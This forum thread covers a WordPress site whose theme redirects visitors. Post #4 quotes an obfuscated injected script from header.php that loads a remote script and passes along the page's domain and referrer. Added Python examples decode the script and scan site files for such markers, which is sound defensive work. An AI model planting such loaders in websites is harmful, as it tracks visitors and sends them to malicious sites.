My Website links to Malicious sites


  1. Posts : 135
    Windows 7 Ultimate x32
       #1

    My Website links to Malicious sites


    Good Day

    I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.

    Since it has been on the webserver (at a trusted hosting company), I get url redirects to malicious sites when I am browsing through my website.

    Here is my site: http://evolutionof4.co.za

    The malicious sites it links to are: themeforest.net, carolini.net amongst others.

    I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.

    I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...

    Any help?

    Thank you


  2. Posts : 5,605
    Originally Win 7 Hm Prem x64 Ver 6.1.7600 Build 7601-SP1 | Upgraded to Windows 10 December 14, 2019
       #2

    It is my understanding that Wordpress can be vulnerable to malicious code, have you seen these?

    https://wordpress.org/support/topic/...malcious-sites

    Some really good information here: FAQ My site was hacked « WordPress Codex

    Do a search for: Wordpress Website links to Malicious sites


  3. Posts : 35
    Windows 7 64 / Windows 8 64
       #3

    1. Investigate if there is .htaccess file and if it is infected or not.
    2. Investigate if there is weird code in index.php or other PHP scripts. You might wish to extract default Wordpress 3.5 on top.
    3. Disable your theme and plugins one by one and see if problems continue.


  4. Posts : 135
    Windows 7 Ultimate x32
    Thread Starter
       #4

    Thank you guys. The suggestions helped. Appreciate!

    I think the following code is producing the problem. It was in my header.php page:

    <script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>


  5. Posts : 5,605
    Originally Win 7 Hm Prem x64 Ver 6.1.7600 Build 7601-SP1 | Upgraded to Windows 10 December 14, 2019
       #5

    You are welcome, glad we could help!

    Are you saying the whole section of code looks suspicious because it is code you do not remember using?

    I am not very knowledgeable about Wordpress code, but these two areas do:
    {return c.toString(a)};if(!''.replace(/^/,String)) and |scr|ipt|.

    Return, if, then replace, and why would you place a bar between words?

    Maybe gied could explain?

    Have you been able to re-work the code and test it?


  6. Posts : 35
    Windows 7 64 / Windows 8 64
       #6

    This is obscured in JS url that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
    As header.php file is infected, one should think how it could happen:
    1. Someone broke in ftp account (scan your PC with second opinion scanner like hitman pro, do not use FTP in non-secure locations as passwords can be sniffed and you should change them)
    2. Hosting provider screwed up
    3. There is vulnerability in plugin, theme.
    4. The theme was infected before installation.
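Added example, not part of any post in this thread: a static unpacker for the `eval(function(p,a,c,k,e,r)...` wrapper quoted in post #4, which recovers the hidden script as text without executing it. The sample is that post's argument list with the wrapper body abridged and the keyword shown as "w rite" read as "write" (an assumption); the base-62 digit table goes beyond the radix of 25 used on this page.

```python
import re

# Argument list of the packed script from post #4; wrapper body abridged and
# "w rite" read as "write" (assumption about a forum line-wrap artifact).
PACKED = (
    r"""eval(function(p,a,c,k,e,r){/* decoder body omitted */return p}"""
    r"""('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)"""
    r"""+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,"""
    r"""'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||"""
    r"""platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|"""
    r"""1000|script'.split('|'),0,{}))"""
)

JS_STR = r"'((?:[^'\\]|\\.)*)'"
ARGS = re.compile(r"\}\s*\(\s*" + JS_STR + r"\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*"
                  + JS_STR + r"\s*\.split\('\|'\)")
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def encode(index, radix):
    """Token the packer emits for keyword number `index` (radix up to 62)."""
    head = "" if index < radix else encode(index // radix, radix)
    return head + DIGITS[index % radix]


def unpack(source):
    """Return the hidden script as text, or None if no packer call is found."""
    match = ARGS.search(source)
    if match is None:
        return None
    payload, radix, count, words = match.groups()
    payload = re.sub(r"\\(.)", r"\1", payload)   # undo \' and \\ escapes only
    words = words.split("|")
    table = {encode(i, int(radix)): w
             for i, w in enumerate(words[:int(count)]) if w}
    # Empty keywords mean "token stands for itself", so they are left alone.
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload)


def remote_urls(script):
    """Absolute URLs the decoded script refers to."""
    return re.findall(r"https?://[^\s'\"?]+", script)


if __name__ == "__main__":
    decoded = unpack(PACKED)
    print(decoded)
    print(remote_urls(decoded))
```

The decoded text shows a `document.write` call that adds a script tag pointing at a remote host and passes the page's domain and referrer in the query string.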


  7. Posts : 5,605
    Originally Win 7 Hm Prem x64 Ver 6.1.7600 Build 7601-SP1 | Upgraded to Windows 10 December 14, 2019
       #7

    gied, how does a Wordpress user know what code is malevolent?


  8. Posts : 25,847
    Windows 10 Pro. 64/ version 1709 Windows 7 Pro/64
       #8


  9. Posts : 135
    Windows 7 Ultimate x32
    Thread Starter
       #9

    Thank you so much guys. Really appreciate the tips and helpful links.

    @gied:
    gied said:
    This is obscured in JS url that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
    As header.php file is infected, one should think how it could happen:
    1. Someone broke in ftp account (scan your PC with second opinion scanner like hitman pro, do not use FTP in non-secure locations as passwords can be sniffed and you should change them)
    2. Hosting provider screwed up
    3. There is vulnerability in plugin, theme.
    4. The theme was infected before installation.
    I doubt if anyone hacked my ftp account. I use wireshark myself and I know how easy it is to sniff unencrypted credentials. I think the theme I used (Themeforest.net) contained the code from the start, since the files were there from the start I suspect... Also, some of the sites it redirects to are the theme creator's site - they just want exposure, traffic and SEO backlinks to their site...

    Thank you for your expert opinion


  10. Posts : 35
    Windows 7 64 / Windows 8 64
       #10

    Anak: Obscure JS in place that does not make sense is by default malicious. So is for example code, that tries to determine referer and/or redirects to other website. There are no very good tools to detect the code, but one has to inspect it for something strange. Also, one can compare files one by one with the ones of clean install. The real problem is with unsafe plugins though. Or malicious theme creators.
    DexterousDave:
    If this is theme creator sites, then yeah. It is bad that Themeforest distributes malicious themes.
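Added example, not part of any post in this thread: the file-by-file comparison against a clean install suggested in post #10, combined with a search for markers seen in the script from post #4. The directory arguments, the marker list and the finding labels are assumptions chosen for illustration.

```python
import hashlib
import re
from pathlib import Path

# Heuristic markers based on the script quoted in this thread (not a complete list).
MARKERS = {
    "packed-js": re.compile(r"eval\(function\(p,a,c,k,e,[rd]\)"),
    "split-script-tag": re.compile(r"""<scr['"]\s*\+\s*['"]ipt"""),
    "referrer-read": re.compile(r"document\.referrer"),
}
TEXT_SUFFIXES = {".php", ".js", ".html", ".htm"}


def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit(site_dir, clean_dir):
    """Map each suspicious file (path relative to site_dir) to its findings."""
    site, clean = Path(site_dir), Path(clean_dir)
    report = {}
    for path in sorted(p for p in site.rglob("*") if p.is_file()):
        rel = path.relative_to(site)
        findings = []
        reference = clean / rel
        if not reference.is_file():
            findings.append("not-in-clean-copy")
        elif sha256(reference) != sha256(path):
            findings.append("differs-from-clean-copy")
        # Marker search also covers files that have no clean counterpart,
        # such as a theme that shipped with the script already in it.
        if path.suffix.lower() in TEXT_SUFFIXES or path.name == ".htaccess":
            text = path.read_text(errors="replace")
            findings += [name for name, rx in MARKERS.items() if rx.search(text)]
        if findings:
            report[rel.as_posix()] = findings
    return report
```

A file reported only as `not-in-clean-copy` is not necessarily hostile (themes, plugins and uploads are never part of a core download), so the marker findings are what narrow the manual inspection.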


 
Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.